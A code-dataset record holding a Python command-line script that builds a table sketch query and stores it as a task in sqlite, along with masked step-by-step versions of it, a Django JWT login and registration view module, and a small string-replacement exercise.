elif order_input == 'n':
break
else:
print('y/n only!')
return ordered
def input_limit():
limit = None
while True:
limit_input = input('Limit results to n tuples? (int or blank) > ')
if not limit_input:
break
try:
limit = int(limit_input)
break
except Exception as e:
print('int or blank only!')
return limit
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
def input_tsq_row(row_num, tsq_types):
while True:
row_input = input(f'Row {row_num} (semicolon-separated values) > ')
tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))
validated = True
for i, cell in enumerate(tsq_row):
if tsq_types[i] == 'number':
try:
float(cell)
except Exception as e:
print('At least one cell value is invalid.')
validated = False
break
if validated:
break
return tsq_row
def main():
config = configparser.ConfigParser()
config.read('config.ini')
db_path = config['db']['path']
conn = sqlite3.connect(db_path)
db_name = input_db_name(conn)
nlq = input_nlq()
num_cols = input_num_cols()
tsq = TableSketchQuery(num_cols)
tsq.types = input_tsq_types(num_cols)
tsq_row_count = input_tsq_row_count()
for i in range(tsq_row_count):
tsq.values.append(input_tsq_row(i + 1, tsq.types))
tsq.order = input_order()
tsq.limit = input_limit()
print(tsq.to_proto())
cur = conn.cursor()
cur.execute(
"""INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)
VALUES (?, ?, ?, ?, ?, ?)"""
, (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().
SerializeToString(), 'waiting', int(time.time())))
conn.commit()
conn.close()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
import configparser
import sqlite3
import time
import uuid
from duoquest.tsq import TableSketchQuery
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
def input_order():
ordered = False
while True:
order_input = input('Should results be ordered? (y/n) > ')
if order_input == 'y':
ordered = True
break
elif order_input == 'n':
break
else:
print('y/n only!')
return ordered
def input_limit():
limit = None
while True:
limit_input = input('Limit results to n tuples? (int or blank) > ')
if not limit_input:
break
try:
limit = int(limit_input)
break
except Exception as e:
print('int or blank only!')
return limit
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
def input_tsq_row(row_num, tsq_types):
while True:
row_input = input(f'Row {row_num} (semicolon-separated values) > ')
tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))
validated = True
for i, cell in enumerate(tsq_row):
if tsq_types[i] == 'number':
try:
float(cell)
except Exception as e:
print('At least one cell value is invalid.')
validated = False
break
if validated:
break
return tsq_row
def main():
config = configparser.ConfigParser()
config.read('config.ini')
db_path = config['db']['path']
conn = sqlite3.connect(db_path)
db_name = input_db_name(conn)
nlq = input_nlq()
num_cols = input_num_cols()
tsq = TableSketchQuery(num_cols)
tsq.types = input_tsq_types(num_cols)
tsq_row_count = input_tsq_row_count()
for i in range(tsq_row_count):
tsq.values.append(input_tsq_row(i+1, tsq.types))
tsq.order = input_order()
tsq.limit = input_limit()
print(tsq.to_proto())
cur = conn.cursor()
cur.execute('''INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)
VALUES (?, ?, ?, ?, ?, ?)''',
(str(uuid.uuid4()), db_name, nlq,
tsq.to_proto().SerializeToString(), 'waiting',
int(time.time())))
conn.commit()
conn.close()
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "54ec1961f4835f575e7129bd0b2fcdeb97be2f03",
"index": 93,
"step-1": "<mask token>\n\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\n<mask token>\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? (int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\n<mask token>\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? (int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? (int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\n<mask token>\n",
"step-4": "import configparser\nimport sqlite3\nimport time\nimport uuid\nfrom duoquest.tsq import TableSketchQuery\n\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? (int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n return types\n\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n return tsq_row\n\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n conn = sqlite3.connect(db_path)\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n tsq = TableSketchQuery(num_cols)\n tsq.types = input_tsq_types(num_cols)\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i + 1, tsq.types))\n tsq.order = input_order()\n tsq.limit = input_limit()\n print(tsq.to_proto())\n cur = conn.cursor()\n cur.execute(\n \"\"\"INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)\"\"\"\n , (str(uuid.uuid4()), db_name, nlq, tsq.to_proto().\n SerializeToString(), 'waiting', int(time.time())))\n conn.commit()\n conn.close()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import configparser\nimport sqlite3\nimport time\nimport uuid\n\nfrom duoquest.tsq import TableSketchQuery\n\ndef input_db_name(conn):\n while True:\n db_name = input('Database name (default: concert_singer) > ')\n if not db_name:\n db_name = 'concert_singer'\n cur = conn.cursor()\n\n cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))\n if cur.fetchone():\n break\n else:\n print(f'<{db_name}> is not a valid database.')\n return db_name\n\ndef input_nlq():\n nlq = input('NLQ (default: How many singers are there?)> ')\n if not nlq:\n nlq = 'How many singers are there?'\n return nlq\n\ndef input_num_cols():\n while True:\n num_cols = input('Number of columns > ')\n try:\n num_cols = int(num_cols)\n break\n except Exception as e:\n print('Number of columns should be integer!')\n return num_cols\n\ndef input_order():\n ordered = False\n while True:\n order_input = input('Should results be ordered? (y/n) > ')\n if order_input == 'y':\n ordered = True\n break\n elif order_input == 'n':\n break\n else:\n print('y/n only!')\n return ordered\n\ndef input_limit():\n limit = None\n while True:\n limit_input = input('Limit results to n tuples? (int or blank) > ')\n if not limit_input:\n break\n try:\n limit = int(limit_input)\n break\n except Exception as e:\n print('int or blank only!')\n return limit\n\ndef input_tsq_types(num_cols):\n while True:\n types_input = input('Types (`text` or `number`, comma separated)> ')\n types = list(map(lambda x: x.strip(), types_input.split(',')))\n\n if any(map(lambda x: x not in ('text', 'number'), types)):\n print('Types must be `text` or `number`')\n continue\n\n if len(types) != num_cols:\n print('Number of types must match number of columns.')\n continue\n break\n\n return types\n\ndef input_tsq_row_count():\n tsq_row_count = 0\n while True:\n tsq_row_count_input = input('Number of TSQ rows (int) > ')\n try:\n tsq_row_count = int(tsq_row_count_input)\n break\n except Exception as e:\n print('int only!')\n return tsq_row_count\n\ndef input_tsq_row(row_num, tsq_types):\n while True:\n row_input = input(f'Row {row_num} (semicolon-separated values) > ')\n tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))\n\n validated = True\n for i, cell in enumerate(tsq_row):\n if tsq_types[i] == 'number':\n try:\n float(cell)\n except Exception as e:\n print('At least one cell value is invalid.')\n validated = False\n break\n if validated:\n break\n\n return tsq_row\n\ndef main():\n config = configparser.ConfigParser()\n config.read('config.ini')\n db_path = config['db']['path']\n\n conn = sqlite3.connect(db_path)\n\n db_name = input_db_name(conn)\n nlq = input_nlq()\n num_cols = input_num_cols()\n\n tsq = TableSketchQuery(num_cols)\n\n tsq.types = input_tsq_types(num_cols)\n\n tsq_row_count = input_tsq_row_count()\n for i in range(tsq_row_count):\n tsq.values.append(input_tsq_row(i+1, tsq.types))\n\n tsq.order = input_order()\n tsq.limit = input_limit()\n\n print(tsq.to_proto())\n\n cur = conn.cursor()\n cur.execute('''INSERT INTO tasks (tid, db, nlq, tsq_proto, status, time)\n VALUES (?, ?, ?, ?, ?, ?)''',\n (str(uuid.uuid4()), db_name, nlq,\n tsq.to_proto().SerializeToString(), 'waiting',\n int(time.time())))\n conn.commit()\n conn.close()\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
6,
7,
8,
11,
12
]
}
|
[
6,
7,
8,
11,
12
] |
import os
from datetime import datetime, timedelta
from django.shortcuts import render
from django.utils.decorators import method_decorator
from rest_framework.viewsets import GenericViewSet, mixins
from common.jwt_util import generate_jwt
from .serializers import ApiUser, ApiUserSerializer, UserSerializer
from common.myresponse import StatusResponse
from rest_framework.generics import GenericAPIView
from .models import User
from common.utils.login_util import login_decorator
# Create your views here.
@method_decorator(login_decorator,name="list")
class UsersOptionsView(GenericViewSet, mixins.ListModelMixin):
"""
list:
返回用户列表
"""
serializer_class = ApiUserSerializer
queryset = User.objects.filter(is_superuser=0,is_active=1).all()
def list(self, request, *args, **kwargs):
return StatusResponse(data=super().list(request).data)
class UserLoginView(GenericAPIView):
def _generate_tokens(self, user_id, with_refresh_token=True):
"""
生成token 和refresh_token
:param user_id: 用户id
:return: token, refresh_token
"""
# 颁发JWT
now = datetime.utcnow()
expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))
token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)
refresh_token = None
if with_refresh_token:
refresh_expiry = now + timedelta(days=float(os.environ['JWT_REFRESH_DAYS']))
refresh_token = generate_jwt({'user_id': user_id, 'refresh': True}, refresh_expiry)
return token, refresh_token
def post(self, request):
username = request.data.get("username")
password = request.data.get("password")
try:
user = User.objects.get(username=username)
except User.DoesNotExist as e:
return StatusResponse(http_code=400,data={"tip": "用户不存在"})
if user is not None and user.check_password(password):
token, refresh_token = self._generate_tokens(user.id, with_refresh_token=True)
data = {
"token": token,
"refresh_token": refresh_token,
"id": user.id,
"username": user.username
}
response = StatusResponse(data=data, http_code=201)
return response
return StatusResponse(http_code=400,data={"tip":"登录失败"})
def put(self,request):
if request.user_id and request.refresh:
token,refresh_token = self._generate_tokens(request.user_id, with_refresh_token=False)
data ={
"id":request.user_id,
"token":token
}
response = StatusResponse(data=data, http_code=201)
return response
else:
return StatusResponse(http_code=401, data={"tip": "token刷新失败"})
class UserRegistView(GenericAPIView):
serializer_class = UserSerializer
def post(self, request):
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
serializer.save()
return StatusResponse(http_code=200,data=serializer.data)
|
normal
|
{
"blob_id": "0457ac2ecd0a951b0088c887539ab696797d68bc",
"index": 4557,
"step-1": "<mask token>\n\n\nclass UserLoginView(GenericAPIView):\n\n def _generate_tokens(self, user_id, with_refresh_token=True):\n \"\"\"\n 生成token 和refresh_token\n :param user_id: 用户id\n :return: token, refresh_token\n \"\"\"\n now = datetime.utcnow()\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\n refresh_token = None\n if with_refresh_token:\n refresh_expiry = now + timedelta(days=float(os.environ[\n 'JWT_REFRESH_DAYS']))\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': \n True}, refresh_expiry)\n return token, refresh_token\n\n def post(self, request):\n username = request.data.get('username')\n password = request.data.get('password')\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist as e:\n return StatusResponse(http_code=400, data={'tip': '用户不存在'})\n if user is not None and user.check_password(password):\n token, refresh_token = self._generate_tokens(user.id,\n with_refresh_token=True)\n data = {'token': token, 'refresh_token': refresh_token, 'id':\n user.id, 'username': user.username}\n response = StatusResponse(data=data, http_code=201)\n return response\n return StatusResponse(http_code=400, data={'tip': '登录失败'})\n\n def put(self, request):\n if request.user_id and request.refresh:\n token, refresh_token = self._generate_tokens(request.user_id,\n with_refresh_token=False)\n data = {'id': request.user_id, 'token': token}\n response = StatusResponse(data=data, http_code=201)\n return response\n else:\n return StatusResponse(http_code=401, data={'tip': 'token刷新失败'})\n\n\nclass UserRegistView(GenericAPIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return StatusResponse(http_code=200, data=serializer.data)\n",
"step-2": "<mask token>\n\n\n@method_decorator(login_decorator, name='list')\nclass UsersOptionsView(GenericViewSet, mixins.ListModelMixin):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass UserLoginView(GenericAPIView):\n\n def _generate_tokens(self, user_id, with_refresh_token=True):\n \"\"\"\n 生成token 和refresh_token\n :param user_id: 用户id\n :return: token, refresh_token\n \"\"\"\n now = datetime.utcnow()\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\n refresh_token = None\n if with_refresh_token:\n refresh_expiry = now + timedelta(days=float(os.environ[\n 'JWT_REFRESH_DAYS']))\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': \n True}, refresh_expiry)\n return token, refresh_token\n\n def post(self, request):\n username = request.data.get('username')\n password = request.data.get('password')\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist as e:\n return StatusResponse(http_code=400, data={'tip': '用户不存在'})\n if user is not None and user.check_password(password):\n token, refresh_token = self._generate_tokens(user.id,\n with_refresh_token=True)\n data = {'token': token, 'refresh_token': refresh_token, 'id':\n user.id, 'username': user.username}\n response = StatusResponse(data=data, http_code=201)\n return response\n return StatusResponse(http_code=400, data={'tip': '登录失败'})\n\n def put(self, request):\n if request.user_id and request.refresh:\n token, refresh_token = self._generate_tokens(request.user_id,\n with_refresh_token=False)\n data = {'id': request.user_id, 'token': token}\n response = StatusResponse(data=data, http_code=201)\n return response\n else:\n return StatusResponse(http_code=401, data={'tip': 'token刷新失败'})\n\n\nclass UserRegistView(GenericAPIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return StatusResponse(http_code=200, data=serializer.data)\n",
"step-3": "<mask token>\n\n\n@method_decorator(login_decorator, name='list')\nclass UsersOptionsView(GenericViewSet, mixins.ListModelMixin):\n <mask token>\n serializer_class = ApiUserSerializer\n queryset = User.objects.filter(is_superuser=0, is_active=1).all()\n\n def list(self, request, *args, **kwargs):\n return StatusResponse(data=super().list(request).data)\n\n\nclass UserLoginView(GenericAPIView):\n\n def _generate_tokens(self, user_id, with_refresh_token=True):\n \"\"\"\n 生成token 和refresh_token\n :param user_id: 用户id\n :return: token, refresh_token\n \"\"\"\n now = datetime.utcnow()\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\n refresh_token = None\n if with_refresh_token:\n refresh_expiry = now + timedelta(days=float(os.environ[\n 'JWT_REFRESH_DAYS']))\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': \n True}, refresh_expiry)\n return token, refresh_token\n\n def post(self, request):\n username = request.data.get('username')\n password = request.data.get('password')\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist as e:\n return StatusResponse(http_code=400, data={'tip': '用户不存在'})\n if user is not None and user.check_password(password):\n token, refresh_token = self._generate_tokens(user.id,\n with_refresh_token=True)\n data = {'token': token, 'refresh_token': refresh_token, 'id':\n user.id, 'username': user.username}\n response = StatusResponse(data=data, http_code=201)\n return response\n return StatusResponse(http_code=400, data={'tip': '登录失败'})\n\n def put(self, request):\n if request.user_id and request.refresh:\n token, refresh_token = self._generate_tokens(request.user_id,\n with_refresh_token=False)\n data = {'id': request.user_id, 'token': token}\n response = StatusResponse(data=data, http_code=201)\n return response\n else:\n return StatusResponse(http_code=401, data={'tip': 'token刷新失败'})\n\n\nclass UserRegistView(GenericAPIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return StatusResponse(http_code=200, data=serializer.data)\n",
"step-4": "<mask token>\n\n\n@method_decorator(login_decorator, name='list')\nclass UsersOptionsView(GenericViewSet, mixins.ListModelMixin):\n \"\"\"\n list:\n 返回用户列表\n \"\"\"\n serializer_class = ApiUserSerializer\n queryset = User.objects.filter(is_superuser=0, is_active=1).all()\n\n def list(self, request, *args, **kwargs):\n return StatusResponse(data=super().list(request).data)\n\n\nclass UserLoginView(GenericAPIView):\n\n def _generate_tokens(self, user_id, with_refresh_token=True):\n \"\"\"\n 生成token 和refresh_token\n :param user_id: 用户id\n :return: token, refresh_token\n \"\"\"\n now = datetime.utcnow()\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\n refresh_token = None\n if with_refresh_token:\n refresh_expiry = now + timedelta(days=float(os.environ[\n 'JWT_REFRESH_DAYS']))\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': \n True}, refresh_expiry)\n return token, refresh_token\n\n def post(self, request):\n username = request.data.get('username')\n password = request.data.get('password')\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist as e:\n return StatusResponse(http_code=400, data={'tip': '用户不存在'})\n if user is not None and user.check_password(password):\n token, refresh_token = self._generate_tokens(user.id,\n with_refresh_token=True)\n data = {'token': token, 'refresh_token': refresh_token, 'id':\n user.id, 'username': user.username}\n response = StatusResponse(data=data, http_code=201)\n return response\n return StatusResponse(http_code=400, data={'tip': '登录失败'})\n\n def put(self, request):\n if request.user_id and request.refresh:\n token, refresh_token = self._generate_tokens(request.user_id,\n with_refresh_token=False)\n data = {'id': request.user_id, 'token': token}\n response = StatusResponse(data=data, http_code=201)\n return response\n else:\n return StatusResponse(http_code=401, data={'tip': 'token刷新失败'})\n\n\nclass UserRegistView(GenericAPIView):\n serializer_class = UserSerializer\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return StatusResponse(http_code=200, data=serializer.data)\n",
"step-5": "import os\r\nfrom datetime import datetime, timedelta\r\n\r\nfrom django.shortcuts import render\r\nfrom django.utils.decorators import method_decorator\r\nfrom rest_framework.viewsets import GenericViewSet, mixins\r\n\r\nfrom common.jwt_util import generate_jwt\r\nfrom .serializers import ApiUser, ApiUserSerializer, UserSerializer\r\nfrom common.myresponse import StatusResponse\r\nfrom rest_framework.generics import GenericAPIView\r\nfrom .models import User\r\nfrom common.utils.login_util import login_decorator\r\n\r\n\r\n# Create your views here.\r\n\r\n@method_decorator(login_decorator,name=\"list\")\r\nclass UsersOptionsView(GenericViewSet, mixins.ListModelMixin):\r\n \"\"\"\r\n list:\r\n 返回用户列表\r\n \"\"\"\r\n serializer_class = ApiUserSerializer\r\n queryset = User.objects.filter(is_superuser=0,is_active=1).all()\r\n\r\n def list(self, request, *args, **kwargs):\r\n return StatusResponse(data=super().list(request).data)\r\n\r\n\r\n\r\nclass UserLoginView(GenericAPIView):\r\n def _generate_tokens(self, user_id, with_refresh_token=True):\r\n \"\"\"\r\n 生成token 和refresh_token\r\n :param user_id: 用户id\r\n :return: token, refresh_token\r\n \"\"\"\r\n # 颁发JWT\r\n now = datetime.utcnow()\r\n expiry = now + timedelta(hours=float(os.environ['JWT_EXPIRY_HOURS']))\r\n token = generate_jwt({'user_id': user_id, 'refresh': False}, expiry)\r\n\r\n refresh_token = None\r\n if with_refresh_token:\r\n refresh_expiry = now + timedelta(days=float(os.environ['JWT_REFRESH_DAYS']))\r\n refresh_token = generate_jwt({'user_id': user_id, 'refresh': True}, refresh_expiry)\r\n return token, refresh_token\r\n\r\n def post(self, request):\r\n\r\n username = request.data.get(\"username\")\r\n password = request.data.get(\"password\")\r\n try:\r\n user = User.objects.get(username=username)\r\n except User.DoesNotExist as e:\r\n return StatusResponse(http_code=400,data={\"tip\": \"用户不存在\"})\r\n\r\n if user is not None and user.check_password(password):\r\n token, refresh_token = self._generate_tokens(user.id, with_refresh_token=True)\r\n data = {\r\n \"token\": token,\r\n \"refresh_token\": refresh_token,\r\n \"id\": user.id,\r\n \"username\": user.username\r\n }\r\n response = StatusResponse(data=data, http_code=201)\r\n return response\r\n return StatusResponse(http_code=400,data={\"tip\":\"登录失败\"})\r\n def put(self,request):\r\n if request.user_id and request.refresh:\r\n token,refresh_token = self._generate_tokens(request.user_id, with_refresh_token=False)\r\n data ={\r\n \"id\":request.user_id,\r\n \"token\":token\r\n }\r\n response = StatusResponse(data=data, http_code=201)\r\n return response\r\n else:\r\n return StatusResponse(http_code=401, data={\"tip\": \"token刷新失败\"})\r\n\r\nclass UserRegistView(GenericAPIView):\r\n serializer_class = UserSerializer\r\n def post(self, request):\r\n serializer = self.get_serializer(data=request.data)\r\n serializer.is_valid(raise_exception=True)\r\n serializer.save()\r\n return StatusResponse(http_code=200,data=serializer.data)\r\n",
"step-ids": [
7,
8,
10,
11,
13
]
}
|
[
7,
8,
10,
11,
13
] |
'''
Функція replace() може використовуватися для заміни будь-якого слова у рядку іншим словом.
Прочитайте кожен рядок зі створеного у попередньому завданні файлу learning_python.txt і замініть слово Python назвою іншої мови,
наприклад C при виведенні на екран. Це завдання написати в окремій функції.
'''
def reader():
with open('possibilities.txt', 'r') as file1:
file_lines = [x.strip() for x in file1.readlines()]
for e in file_lines:
n = e.replace('Python', 'C++')
print(n)
if __name__ == '__main__':
reader()
|
normal
|
{
"blob_id": "6d80a89a47b68fd8d81739787897355671ca94e9",
"index": 5815,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef reader():\n with open('possibilities.txt', 'r') as file1:\n file_lines = [x.strip() for x in file1.readlines()]\n for e in file_lines:\n n = e.replace('Python', 'C++')\n print(n)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef reader():\n with open('possibilities.txt', 'r') as file1:\n file_lines = [x.strip() for x in file1.readlines()]\n for e in file_lines:\n n = e.replace('Python', 'C++')\n print(n)\n\n\nif __name__ == '__main__':\n reader()\n",
